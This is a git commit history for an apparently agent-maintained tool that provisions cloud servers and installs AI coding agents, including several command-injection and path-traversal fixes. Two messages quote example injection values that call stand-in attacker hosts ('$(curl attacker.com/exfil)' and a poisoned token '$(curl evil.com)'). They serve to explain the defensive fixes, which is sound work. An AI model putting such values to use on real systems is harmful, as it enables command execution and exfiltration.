* feat: add E2E test harness and integrate into QA pipeline

Add test/e2e.sh — a full E2E test harness that provisions real servers,
installs agents, and verifies setup across all clouds. Features:
- Smoke test (one canary agent per cloud) and full matrix modes
- Credential auto-detection for 8 clouds
- Per-cloud preflight validation (sequential) then parallel agent tests
- Stale server cleanup, timing history, cross-cloud comparison
- Auto-fix and optimization phases via Claude agents
- macOS bash 3.2 compatible

Integrate E2E as Phase 5 in both qa-cycle.sh and qa-dry-run.sh:
- Runs after mock tests pass, gated on cloud credentials
- Phase 5b auto-fixes failures using per-agent worktree branches
- Parses results and includes in QA summary

Also fixes:
- shared/common.sh: honour SPAWN_NON_INTERACTIVE=1 in safe_read()
- aws/lib/common.sh: fix SSH key import (use cat instead of base64,
  handle race condition on concurrent imports)

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-17 20:41:07 -05:00
A
3e13a213f1
security: fix command injection in fly/lib/common.sh bash -c invocations (#1423)
Quote $escaped_cmd inside the -C argument to bash -c in run_server()
and interactive_session() to prevent word splitting. Without quotes,
even though printf '%q' escapes shell metacharacters, the shell still
splits the escaped command on whitespace before passing it to bash -c,
enabling potential argument injection.

Fixes #1422

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 19:35:23 -05:00
A
c097a9d234
feat: add headless SDK mode for programmatic provisioning (#1420)
* feat: add headless SDK mode for programmatic provisioning (#1181)

Add --headless and --output json flags to enable non-interactive
provisioning with structured JSON output on stdout.

- --headless: disables prompts, OAuth browser flows, and SSH sessions
- --output json: outputs structured SpawnResult JSON on stdout
- Exit code contract: 0=success, 1=execution, 2=download, 3=validation
- Upfront credential validation (fail-fast before provisioning)
- Script stdout piped to stderr to keep JSON output clean
- SPAWN_HEADLESS=1 env var set for bash scripts

Closes #1181

-- refactor/ux-engineer

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* fix: restore critical test mocks for fly SSH readiness checks

The PR inadvertently removed essential mock logic:
- fly ssh mock no longer responded to 'echo ok' commands
- timeout/gtimeout mocks were removed (needed for SSH polling)
- python3 mock was removed (needed for JSON parsing)
- /tmp/spawn_* cleanup was removed from test teardown

This caused 29 fly/* test failures with 'SSH connectivity failed'.

Restores the exact mock implementations from main branch.

---------

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 15:32:14 -05:00
A
af1a2014fa
fix: resolve 32 test failures in run.sh and mock.sh (#1419)
test/run.sh (3 failures fixed):
- Export TEST_DIR so sprite mock tracks create→list state across processes
- Add sleep mock to avoid 30s polling loops in ensure_sprite_exists
- Add timeout/gtimeout, python3 pass-through mocks for host protection
- Set HOME to fake home for isolation, create fake home directory structure
- Clean up /tmp/spawn_* temp files in cleanup trap

test/mock.sh (29 failures fixed):
- Fix fly mock to detect "echo ok" in fly ssh console -C arguments
  (including printf %q escaped form) so _fly_wait_for_ssh() succeeds
- Add timeout/gtimeout pass-through mocks to prevent system calls
- Add python3 delegate mock for JSON parsing in shared/common.sh
- Clean up /tmp/spawn_* temp files in cleanup trap

Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-17 11:49:28 -08:00
A
edb475e3d2
security: fix command injection in hetzner token extraction (#1418)
Fixes #1411

Replaced unsafe xargs -I{} pattern with grep -F for literal string matching
to prevent command injection if the hcloud context name contains shell
metacharacters.

Previous code: xargs interpolated context name directly into grep pattern
New code: grep -F treats context name as literal string (no interpretation)

Attack vector prevented: malicious context name like '$(curl attacker.com/exfil)'
could execute arbitrary commands during token extraction.

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 14:08:31 -05:00
A
266fdd9a1d
security: prevent command injection in key-request.sh env var loading (#1415)
* security: prevent command injection in key-request.sh env var loading

Fixes #1405

**Why:**
The _try_load_env_var function loaded API tokens from ~/.config/spawn/{cloud}.json
without validating the value for shell metacharacters. If an attacker could write
malicious config files (e.g., {"HCLOUD_TOKEN": "$(curl evil.com)"}), the injected
commands would execute when the variable was later used in unquoted contexts.

**Changes:**
- Added regex validation in _try_load_env_var (line 88-91) to reject values
  containing shell metacharacters: ; ' " < > | & $ ` \ ( )
- Matches the same pattern used in validate_api_token() from shared/common.sh
- Now returns error and logs security warning if malicious characters detected

**Impact:**
Blocks command injection attacks via config file poisoning. API tokens must now
be clean alphanumeric strings (as they should be from legitimate providers).

Agent: security-auditor

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* security: strengthen key-request.sh regex to block all shell metacharacters

Address security review feedback from PR #1415.

**Changes:**
- Replace blocklist regex with whitelist: `^[a-zA-Z0-9._/@-]+$`
- Now blocks `!`, `{`, `}`, `#`, newlines, tabs, and all other metacharacters
- Update comment to clarify defense-in-depth purpose
- Change error message to match validate_api_token() pattern

**Why whitelist approach:**
API tokens from legitimate cloud providers only contain alphanumeric
characters plus safe chars (-, _, ., /, @). Whitelist is more robust
than trying to enumerate all dangerous shell metacharacters.

-- pr-maintainer

---------

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 13:53:49 -05:00
A
94b09ab29e
security: fix path traversal risk in SPAWN_HOME validation (#1402)
* security: fix path traversal risk in SPAWN_HOME validation

Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* fix: add missing join import and update tests for SPAWN_HOME security validation

Addresses security review feedback on PR #1402:
- Add missing 'join' import to cli-version-and-dispatch.test.ts
- Update all test files to use homedir() instead of tmpdir() for SPAWN_HOME

The security fix in history.ts now enforces that SPAWN_HOME must be within
the user's home directory. All tests have been updated to use home-based
test directories instead of /tmp paths.

Changes:
- cli/src/__tests__/cli-version-and-dispatch.test.ts: Add join to path imports
- All test files: Replace tmpdir() with homedir() and /tmp/spawn- with /.spawn-test-

Tests:
- bun test history.test.ts:  69 pass
- bun test clear-history.test.ts:  27 pass
- bun test cli-version-and-dispatch.test.ts:  62 pass
- bun test list-table-rendering.test.ts:  8 pass

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

---------

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 12:57:01 -05:00
A
858dd48f86
security: fix heredoc variable expansion in security.sh (#1416)
Fixes #1406

Changed all heredocs in security.sh from double-quoted to single-quoted
form to prevent variable expansion, then use explicit sed substitution
for validated values only.

This prevents command injection via ${ISSUE_NUM}, ${SLACK_WEBHOOK},
${WORKTREE_BASE}, and ${REPO_ROOT} in the triage, review_all, and scan
mode prompts.

Pattern applied (matching team_building mode):
- Use 'HEREDOC_EOF' (single quotes) to disable expansion
- Replace variables with PLACEHOLDER tokens
- Use sed -i to substitute only validated values

Agent: ux-engineer

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 12:54:43 -05:00
A
07ff397ee5
security: add SSH key path validation to aws/lib/common.sh (#1414)
Add validation in ensure_ssh_key() to prevent path traversal and
arbitrary file upload attacks:
- Validate public key file exists and is a regular file
- Reject symlinks to prevent reading sensitive system files
- Enforce 10KB size limit (SSH pubkeys are ~100-600 bytes)

Fixes #1407

Agent: complexity-hunter

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 12:54:09 -05:00
A
7187ef1cbf
security: fix unsafe command substitution in GCP cloud-init script (#1413)
Replace nested command substitution $(echo "$(whoami)") with $USER
environment variable to prevent potential command injection attacks.

The nested substitution was vulnerable because:
- whoami could be aliased or PATH-manipulated in compromised environments
- Running as root in cloud-init amplified the security impact
- Double nesting was unnecessary complexity

Using $USER is safer because:
- It's a shell variable, not command execution
- No subprocess spawning or PATH resolution
- Simpler and more reliable

Agent: test-engineer

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 12:54:06 -05:00
A
e52e290b25
fix: enhance sandbox test to detect agent directory residue (#1417)
Fixes #1409

The bash sandbox test now verifies that test runs don't create or
modify agent-specific directories and configuration files:

- Checks that ~/.openclaw, ~/.sprite, and ~/.claude directories are
  not created by test runs
- Verifies ~/.claude.json and ~/.claude/settings.json are not modified
  during tests (using mtime comparison to handle pre-existing files)
- Skips checks for directories/files that existed before tests ran to
  avoid false positives in development environments

This ensures tests remain properly sandboxed and don't pollute the
production environment with agent artifacts.

Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 12:52:24 -05:00
L
6e13256d96
refactor: simplify claude launch — no streaming, no output monitoring (#1412)
Replace the complex claude launch pattern (subshell + PID file + tee
pipe + stream-json + 50-line watchdog monitoring log file growth +
session-end detection) with a simple direct launch:

  claude -p "..." >> "${LOG_FILE}" 2>&1 &

The watchdog is now just a wall-clock timeout. The idle-output detection,
stream-json result parsing, and tee piping are all removed.

Also remove GitHub Actions concurrency groups — the trigger server
already handles dedup (409 for same issue, 409 for same reason), making
the GH Actions concurrency groups redundant queuing.

Changes:
- refactor.sh: simple launch + wall-clock-only watchdog
- security.sh: same simplification
- discovery.sh: same (refactored _kill_claude_process and
  _run_watchdog_loop to simpler signatures)
- All 4 workflows: remove concurrency groups

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-17 09:02:47 -08:00
A
cee05aba80
security: fix incomplete command injection detection in prompt validation (#1401)
* security: fix incomplete command injection detection in prompt validation

Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* fix: refine command injection patterns to avoid false positives

Addresses changes requested in PR review:

- Updated && and || patterns to only match when followed by common shell commands
- Added context-aware check to exclude programming expressions like "a > b && c < d"
- Maintains security by still catching shell command chaining attempts
- All security tests pass including new edge case tests

Fixes false positive rejection of legitimate programming expressions
while still detecting shell injection attempts from issue #1400.

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

---------

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 11:51:33 -05:00
A
1a1c06e038
test: sandbox bash tests to prevent production env pollution (#1404)
Fixes #1403

**Changes:**

1. **test/run.sh** - Isolated mock state files:
   - Changed /tmp/sprite_mock_created* to use TEST_DIR instead
   - Added cleanup of any leaked /tmp files in cleanup() trap
   - Prevents /tmp pollution from mock sprite state files

2. **test/record.sh** - Sandboxed config directory:
   - Added TEST_CONFIG_DIR environment variable support
   - When set, overrides HOME to prevent writing to ~/.config/spawn/
   - Allows tests to run without polluting production config

3. **test/qa-dry-run.sh** - Safe git operations:
   - Changed git checkout to git restore for reverting README changes
   - Prevents potential checkout pollution of working tree
   - Falls back to git checkout -- for older git versions

4. **test/test-sandbox.sh** - New verification test:
   - Verifies no /tmp pollution after test/run.sh
   - Verifies production config not modified
   - Verifies mock.sh uses isolated temp directories

**Why:** Prevents test suite from polluting production environment (file writes to /tmp, ~/.config/spawn/, git state mutations).

Agent: test-engineer

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 11:26:17 -05:00
L
f3cfe890f7
refactor: simplify trigger server to fire-and-forget + fix monitoring loop prompts (#1384)
The trigger server streamed script stdout back to GitHub Actions via a
long-lived HTTP response, requiring --http1.1, heartbeat injection,
server.timeout(req, 0), createEnqueuer, drainStreamOutput, and 90-min
GH Actions timeouts. In practice GitHub Actions is just a dumb trigger
— the real state lives on the VM (log files, journalctl). Simplify to
fire-and-forget: spawn script, return 200 JSON immediately.

Also fix the refactor and discovery team lead monitoring loops. The
prompts buried the loop in a single compressed line that the model
ignored (doing Bash("sleep 10") repeatedly without calling TaskList).
Replace with a dedicated "Monitor Loop (CRITICAL)" section with numbered
steps, matching the security.sh pattern that actually works.

Changes:
- trigger-server.ts: remove ~150 lines of streaming code (createEnqueuer,
  drainStreamOutput, startStreamingRun, heartbeat, ReadableStream),
  replace with startFireAndForgetRun (stdout: "inherit", immediate JSON)
- All 4 workflows: simple curl POST, timeout-minutes 90→5, remove
  --http1.1/-N/--max-time/exit-code handling
- refactor.sh: add Monitor Loop (CRITICAL) section with numbered steps
- discovery-team-prompt.txt: same Monitor Loop fix
- SKILL.md: update architecture docs, remove streaming sections

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-17 10:47:52 -05:00
A
aff3b73850
security: fix medium/low findings from scan (#1395)
* security: fix medium severity findings from scan #763

Addresses remaining medium-severity security findings from issue #763:

1. **Path traversal in invalidate_cloud_key** (shared/key-request.sh)
   - Removed dots from provider name validation regex
   - Changed from ^[a-z0-9][a-z0-9._-]{0,63}$ to ^[a-z0-9][a-z0-9_-]{0,63}$
   - Prevents path traversal via sequences like "foo..bar"

2. **Background process timeout** (shared/key-request.sh)
   - Wrapped fire-and-forget key request in timeout 15s
   - Prevents leaked subprocess if curl hangs beyond --max-time

3. **Rate limiting IP spoofing** (.claude/skills/setup-agent-team/key-server.ts)
   - Switched from x-forwarded-for header to server.requestIP(req)
   - Uses actual connection IP instead of spoofable header

Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* fix: add macOS portability for timeout command

Address review feedback from security team - timeout command is not available
on macOS by default. Added fallback pattern that:
- Uses timeout on Linux (prevents subprocess leak)
- Falls back to curl --max-time only on macOS

This ensures request_missing_cloud_keys() works on both platforms.

Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* security: fix command injection vulnerability in key-request.sh

Fixes the critical command injection vulnerability identified in security review.

Changes:
- Use positional parameters ($1, $2, $3) instead of variable interpolation in bash -c
- Pass variables via -- delimiter to prevent shell escaping issues
- Replace echo with printf for proper formatting (macOS bash 3.x compat)
- Maintain timeout wrapper on Linux and curl --max-time fallback on macOS

Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

---------

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 09:29:20 -05:00
A
026963bf78
fix: readonly property assignments and test expectations (#1396)
Fixed readonly property assignments in commands-compact-list.test.ts by using the existing setTerminalWidth() helper instead of direct Object.defineProperty() calls. This makes the code more maintainable and consistent.

Updated oracle-provider-patterns.test.ts to check for install_claude_code function instead of the outdated claude.ai/install.sh reference, matching the current oracle/claude.sh implementation.

Changes:
- Replaced 4 inline Object.defineProperty() calls with setTerminalWidth() helper
- Updated oracle claude.sh test to check for install_claude_code instead of claude.ai/install.sh
- All compact list tests passing (20/20)

Fixes #1366

Agent: complexity-hunter

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 05:14:40 -08:00
A
31c35594ba
fix: enhance CLI test sandboxing with .ssh directory and verification tests (#1398)
This commit addresses issue #1373 by improving the test sandbox to prevent
accidental writes to the real user environment.

Changes:
1. Enhanced preload.ts:
   - Added .ssh directory creation in sandboxed HOME
   - Expanded documentation explaining sandboxing strategy
   - Clarified safety guarantees for filesystem operations

2. Added sandbox-verification.test.ts:
   - Comprehensive test suite verifying sandbox isolation
   - Tests environment variable sandboxing (HOME, XDG_*)
   - Tests pre-created directories (.config, .ssh, .claude, .cache)
   - Tests filesystem isolation (writes stay in temp directory)
   - Tests subprocess isolation (bash inherits sandboxed env)
   - Tests safety guarantees (no exposure of /root paths)

The existing preload.ts already prevented writes to real home directory
by redirecting process.env.HOME and XDG variables to temp directories.
This commit strengthens that sandboxing with the .ssh directory and adds
comprehensive verification tests to ensure the sandbox works correctly.

Fixes #1373

Agent: test-engineer

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 08:05:29 -05:00
A
7544dd0dcb
feat(cli): add spawn name for each run (#1397)
Implements spawn name feature (#1372) to improve UX:
- Add optional spawn name prompt in interactive mode
- Pass spawn name via SPAWN_NAME env var to shell scripts
- Shell scripts use spawn name as default for resource names
- Store spawn name in history for future reference
- Bump CLI version to 0.4.0

The spawn name is prompted before agent/cloud selection and
automatically used as the default for platform-specific resource
names (server name on Hetzner, sprite name on Sprite, etc.).

Agent: ux-engineer

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 08:05:17 -05:00
A
27e7f32da3
fix: apply test fixes and shell conventions from #1358 (#1394)
Applied the test fixes from PR #1358:

1. Fixed process.stdout.columns mutation in commands-compact-list.test.ts
   - Replaced direct property assignments with Object.defineProperty
   - Created setColumns() helper function for strict mode compatibility
   - Removed duplicate setTerminalWidth() function

2. Updated oracle-provider-patterns.test.ts assertion
   - Changed from checking for "claude.ai/install.sh" URL
   - Now checks for "install_claude_code" function name
   - Matches current oracle/claude.sh implementation

Note: Shell scripts (aws/gptme.sh, gcp/gptme.sh) already have
set -eo pipefail from previous commits - no changes needed.

Fixes #1365

Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 07:59:27 -05:00
A
e55cd149c2
feat(cli): add type-ahead filtering to agent and cloud selection (#1393)
Replace select prompts with autocomplete for improved UX when
choosing agents and clouds. Users can now type to filter the list,
significantly reducing time to find desired options in long lists.

- Replace p.select with p.autocomplete for agent selection
- Replace p.select with p.autocomplete for cloud selection
- Add "type to filter" messaging and placeholder text
- Update CLI version 0.3.2 → 0.3.3

Fixes #1367

Agent: ux-engineer

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 07:21:06 -05:00